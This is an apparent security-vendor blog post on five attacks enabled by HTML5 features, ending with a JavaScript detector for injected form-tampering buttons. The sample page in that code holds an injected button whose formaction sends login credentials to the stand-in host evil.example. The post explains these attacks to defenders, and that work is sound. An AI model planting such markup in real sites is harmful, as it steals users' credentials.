This post is the second of a three-part series of blog entries on HTML5. You can also check the first part: HTML5 – The Good.

Yesterday, we started the first of a three-part series investigating the new HTML5 standard. We started this by looking at some of the new features which are going to improve how we can interact with the Web.

In today’s post, we will look at how some of the features of HTML5 can be misused by attackers. This post is not meant to be an exhaustive list, but if you are interested in more details we will be releasing an in-depth paper on HTML5 Attacks tomorrow.

Below, in no particular order, are 5 new attacks made possible by features introduced in HTML5:

  1. Clickjacking made easy: Clickjacking itself is not a new attack. The attacker loads the target site in an invisible iframe positioned over a decoy page, so the mouse clicks a victim believes are landing on the decoy are actually delivered to the framed site. The attacker’s goal is to make the user click a concealed link or button without their knowledge.
    At the moment, one of the most widely deployed defenses against clickjacking is a technique called frame-killing (also known as frame-busting). The affected site ships JavaScript that checks whether it is running inside an iframe and, if so, refuses to display its content or navigates the top-level window to itself. This technique is already in use by sites such as Facebook, Gmail, and others.
    However, HTML5 adds a new “sandbox” attribute for iframes which, unless the allow-scripts token is present, stops the framed document from running JavaScript. In many cases this leads to a much more secure setup, but it has the downside of nullifying the most widespread defense against clickjacking: an attacker who frames a site with sandbox set prevents its frame-killing script from ever running. Framing restrictions sent as HTTP response headers (the X-Frame-Options header) are enforced by the browser before any script runs, so they are not affected by the sandbox attribute.
  2. Port Scanning using Cross-Origin Requests or WebSockets: With HTML5, a script in the browser can initiate a connection to any IP address or host on (almost) any port; browsers refuse only a short list of well-known ports. The script cannot read the response unless the target site explicitly allows it, but researchers have already shown that the time a request takes to complete or fail differs between open and closed ports, and that this timing can be measured from the page. This allows an attacker to carry out a port scan of a victim’s local network directly from the victim’s browser.
  3. Social Engineering with Web Notifications: We mentioned web notifications in yesterday’s post about the new features introduced by HTML5. These pop-ups, which appear outside the browser window, can be fully customized using HTML code. While this allows for some very nice interaction possibilities, it is also a gold mine for social engineering attacks such as phishing or fake antivirus (FAKEAV) lures, because the user has no reliable way to tell that the pop-up came from a web page. Check the picture below to get an idea of what attackers can do with this new feature.
  4. Tracking victims with Geolocation: Geolocation is one of the most talked about features introduced in HTML5. As a security and privacy safeguard, a site must always ask the user’s permission before it can access this location information. However, as has been seen in the past with features such as Vista’s User Account Control, Android’s application permissions, and invalid HTTPS certificate warnings, security that depends on the user making the right decision rarely works out well. Once permission is given, the site can not only learn the victim’s current location but also track the user in real time as they move around (the API’s watchPosition call exists for exactly this purpose).
  5. Form Tampering: HTML5 adds attributes that let a submit button override the form it belongs to (formaction, formmethod, formtarget and formenctype) and a form attribute that associates a button with any form on the page by id. An attacker who has successfully injected content into a site (e.g. through an XSS attack, or plain HTML injection, since no script is needed) can use them to alter how the forms on that page behave. For example, an attacker can change a normally benign form on an online shop to instead submit to the purchasing page, or make a login form send the user’s credentials to the attacker’s site.

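The form tampering case in point 5, as an added example that is not part of the original post: a constructed page containing a legitimate login form and an injected submit button that uses the HTML5 form and formaction attributes (so it needs no script at all), a small scanner that applies the browser's association and override rules to work out where each submit button really sends the data, and a check that flags submissions leaving the page's origin. The markup, host names and the scanner are this example's own assumptions, not the post's.

```javascript
// Added example: HTML5 form-association attributes as a form-tampering vector,
// and a scanner that finds submit buttons whose effective target is foreign.
// The sample page and host names are constructed for this example (assumption).

const PAGE_URL = 'https://shop.example/account';

// Constructed page: a normal login form, plus one injected <button> placed in
// user-supplied content. It carries no script, only the HTML5 attributes
// form= (associate with the login form by id) and formaction= (override action).
const SAMPLE_HTML = `
<form id="login" action="/login" method="post">
  <input name="user"><input name="pass" type="password">
  <button type="submit">Sign in</button>
</form>
<p>Reviews:</p>
<div class="review">Great shop!
  <button form="login" formaction="https://evil.example/collect" formmethod="get">Sign in</button>
</div>`;

// Minimal tag scanner, sufficient for markup like the sample (assumption: no '>'
// inside attribute values, no tags inside comments or scripts). Returns every
// submit button/input together with the form it is associated with.
function scanSubmitters(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;
  const forms = new Map();   // id -> form attributes
  const found = [];
  let enclosing = null;      // form currently open in document order
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, closing, rawName, attrText] = m;
    const name = rawName.toLowerCase();
    if (closing) { if (name === 'form') enclosing = null; continue; }
    const attrs = {};
    const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
    let a;
    while ((a = attrRe.exec(attrText)) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    if (name === 'form') {
      enclosing = attrs;
      if (attrs.id) forms.set(attrs.id, attrs);
      continue;
    }
    const type = (attrs.type || (name === 'button' ? 'submit' : '')).toLowerCase();
    const isSubmitter = (name === 'button' && type === 'submit') ||
                        (name === 'input' && (type === 'submit' || type === 'image'));
    if (isSubmitter) found.push({ attrs, formId: attrs.form, enclosing });
  }
  // Association rule: an explicit form="id" wins and may point anywhere in the
  // document; otherwise the nearest enclosing form. Unassociated submitters
  // submit nothing and are dropped.
  return found
    .map(s => ({ attrs: s.attrs, owner: s.formId !== undefined ? forms.get(s.formId) : s.enclosing }))
    .filter(s => s.owner);
}

// Override rule: a submitter's formaction/formmethod/formtarget take precedence
// over the owning form's action/method/target; relative URLs resolve against
// the page URL.
function effectiveSubmission(sub, pageUrl) {
  const f = sub.owner;
  const a = sub.attrs;
  const action = a.formaction !== undefined ? a.formaction
               : f.action !== undefined ? f.action : pageUrl;
  return {
    url: new URL(action, pageUrl).href,
    method: (a.formmethod || f.method || 'get').toLowerCase(),
    target: a.formtarget || f.target || '_self',
  };
}

// The check: every submission whose resolved origin is not the page's own.
function findCrossOriginSubmitters(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  return scanSubmitters(html)
    .map(s => effectiveSubmission(s, pageUrl))
    .filter(e => new URL(e.url).origin !== pageOrigin);
}

console.log(findCrossOriginSubmitters(SAMPLE_HTML, PAGE_URL));
```

The injected button is a second "Sign in" control tied to the real login form: whichever of the two the user presses, the browser sends the credentials, but the injected one sends them to evil.example by GET. On the defensive side, stripping script is not enough; an HTML sanitiser has to drop the form, formaction, formmethod and formtarget attributes, and a CSP form-action directive lets the browser refuse submissions to any origin the site did not list, whatever markup got in.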
Those are just five of the new attacks introduced by HTML5, and we covered them at a very high level. Here is the link to the final part of this mini-series, HTML5: The Ugly, and to the release of our paper on HTML5 Attacks.


2 thoughts on “HTML5 – The BAD”
